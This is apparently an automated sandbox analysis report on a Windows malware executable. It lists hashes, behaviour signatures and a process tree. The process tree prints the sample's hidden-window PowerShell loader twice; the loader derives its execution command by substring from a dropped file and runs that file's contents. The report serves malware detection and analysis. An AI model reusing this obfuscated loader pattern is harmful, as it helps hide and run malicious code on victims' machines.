Analysis
-
max time kernel
122s -
max time network
124s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
09-11-2024 03:36
Static task
static1
Behavioral task
behavioral1
Sample
c9f7cbb4a9e4e0db0e717cd71d3b5e5162544866bc7c74cde42fb9240cf193db.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
c9f7cbb4a9e4e0db0e717cd71d3b5e5162544866bc7c74cde42fb9240cf193db.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
Fiskerettens.ps1
Resource
win7-20240903-en
Behavioral task
behavioral4
Sample
Fiskerettens.ps1
Resource
win10v2004-20241007-en
General
-
Target
c9f7cbb4a9e4e0db0e717cd71d3b5e5162544866bc7c74cde42fb9240cf193db.exe
-
Size
1.2MB
-
MD5
cfd68f7d943d702ade1744a68308f0ca
-
SHA1
7e7bb8ff7a01ace1cee4b93d087bfad75aaefa0c
-
SHA256
c9f7cbb4a9e4e0db0e717cd71d3b5e5162544866bc7c74cde42fb9240cf193db
-
SHA512
9a198311992a149e0974d2187be2838a3ed969d284e0722e5a3ddb576c80f0d8eaed6b25683f10ffff8ccfb6bcfcc58ae4ce95747ce8c24e8100387f13f3b7e6
-
SSDEEP
24576:voqqHmQ2mlKCS22++Gpk3C99ZwYAKImqcSb7CkSE9bXy2pf3zxFTB:voZmQ7N25Gpk3CqvTHcQC3E97xF3zTV
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 1384 powershell.exe 2336 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language c9f7cbb4a9e4e0db0e717cd71d3b5e5162544866bc7c74cde42fb9240cf193db.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 1384 powershell.exe 2336 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 1384 powershell.exe Token: SeDebugPrivilege 2336 powershell.exe -
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 2516 wrote to memory of 1384 2516 c9f7cbb4a9e4e0db0e717cd71d3b5e5162544866bc7c74cde42fb9240cf193db.exe 30 PID 2516 wrote to memory of 1384 2516 c9f7cbb4a9e4e0db0e717cd71d3b5e5162544866bc7c74cde42fb9240cf193db.exe 30 PID 2516 wrote to memory of 1384 2516 c9f7cbb4a9e4e0db0e717cd71d3b5e5162544866bc7c74cde42fb9240cf193db.exe 30 PID 2516 wrote to memory of 1384 2516 c9f7cbb4a9e4e0db0e717cd71d3b5e5162544866bc7c74cde42fb9240cf193db.exe 30 PID 2516 wrote to memory of 2336 2516 c9f7cbb4a9e4e0db0e717cd71d3b5e5162544866bc7c74cde42fb9240cf193db.exe 32 PID 2516 wrote to memory of 2336 2516 c9f7cbb4a9e4e0db0e717cd71d3b5e5162544866bc7c74cde42fb9240cf193db.exe 32 PID 2516 wrote to memory of 2336 2516 c9f7cbb4a9e4e0db0e717cd71d3b5e5162544866bc7c74cde42fb9240cf193db.exe 32 PID 2516 wrote to memory of 2336 2516 c9f7cbb4a9e4e0db0e717cd71d3b5e5162544866bc7c74cde42fb9240cf193db.exe 32
Processes
-
C:\Users\Admin\AppData\Local\Temp\c9f7cbb4a9e4e0db0e717cd71d3b5e5162544866bc7c74cde42fb9240cf193db.exe"C:\Users\Admin\AppData\Local\Temp\c9f7cbb4a9e4e0db0e717cd71d3b5e5162544866bc7c74cde42fb9240cf193db.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2516 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -windowstyle hidden "$Analytique=Get-Content -raw 'C:\Users\Admin\AppData\Local\Temp\carinal\Coracosteon\Fiskerettens.udk';$Terminaladgang=$Analytique.SubString(53834,3);.$Terminaladgang($Analytique)"2⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1384
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -windowstyle hidden "$Analytique=Get-Content -raw 'C:\Users\Admin\AppData\Local\Temp\carinal\Coracosteon\Fiskerettens.udk';$Terminaladgang=$Analytique.SubString(53834,3);.$Terminaladgang($Analytique)"2⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2336
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD5f37fcda95440876f842fa9b882ee4d29
SHA1664c2d6d86b8d8ce6d4882f50be2dbe66de599b9
SHA2569efbdf53b28faf81d7223ee996ab306c2f82dd54f96a1a1817e21bc02bbc986d
SHA512e60e739bba821e8dfe12c9b1f692af8f2598460b49a6dde6f7847caf259d0d7fac9a6355b52ac603efed65f44c6b06e9a72d691ccdafe2ba47bcd2fd4b295f6e